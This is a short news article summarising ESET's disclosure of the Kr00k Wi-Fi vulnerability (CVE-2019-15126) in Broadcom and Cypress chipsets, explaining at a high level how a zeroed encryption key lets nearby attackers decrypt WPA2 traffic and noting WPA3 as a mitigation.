At the RSA 2020 conference, ESET, a Slovak internet security company, spoke about the new Kr00k vulnerability (CVE-2019-15126). This issue can allow an attacker to decrypt wireless network packets transmitted from an insecure device. The vulnerability affects both WPA2-Personal and WPA2-Enterprise protocols with AES-CCMP encryption.
Kr00k vulnerability detailed:
According to analysts, any device that uses the Wi-Fi chipsets of Cypress Semiconductor and Broadcom are vulnerable to this issue. Experts tested and confirmed the problem in laptops, smartphones, routers, and IoT devices, which are now affected by this problem. This is total accounts for more than a billion different gadgets that are open to this flaw.
Watch: Motorola RAZR First Look
The essence of the Kr00k vulnerability comes down to encryption, which is used to protect data packages transmitted via Wi-Fi. As a rule, such packets are encrypted with a unique key, which depends on the Wi-Fi password set by the user. But for Broadcom and Cypress chips, this key is reset to zero if you initiate the process of a temporary shutdown, which also occurs due to a bad signal. Thus, Kr00k can open a gap for the leak of confidential user data.
According to ESET experts, attackers can provoke a transition of the device into a prolonged state of disconnection and receive Wi-Fi packets intended for it. Then, by exploiting the Kr00k bug, attackers can decrypt Wi-Fi traffic using a “zero” key. ESET also notes that the Kr00k problem is in many ways similar to the sensational KRACK vulnerability, discovered in 2017.
The Kr00k issue only affects Wi-Fi connections using WPA2-Personal and WPA2-Enterprise WiFi with AES-CCMP encryption. Hence, the inclusion of the WPA3 protocol on the vulnerable device should protect against the attacks described by specialists. In addition, the vulnerability is unlikely to be useful in botnet operators for automated attacks. As it requires the attacker to be close to the victim (within the range of the Wi-Fi network).